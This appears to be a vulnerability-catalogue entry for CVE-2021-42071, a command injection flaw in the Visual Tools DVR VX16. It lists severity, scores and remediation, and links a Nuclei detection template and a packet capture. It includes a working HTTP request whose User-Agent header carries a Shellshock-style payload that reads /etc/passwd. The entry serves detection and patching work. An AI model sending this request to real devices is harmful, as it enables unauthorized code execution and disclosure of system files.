| Title | Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. |
| Remediation | Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device. |
| CVSS Score | 9.8 |
| EPSS Score | 0.91339 |
| CVE ID | CVE-2021-42071 |
| CWE ID | CWE-78 |
| Tags | cve2021 cve edb visualtools rce oast injection visual-tools vkev vuln |
Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
GET /cgi-bin/slogin/login.py HTTP/1.1
Host: www.victim.com
User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd
Connection: close
Accept: */*
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-42071.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-42071.pcap
N/AN/A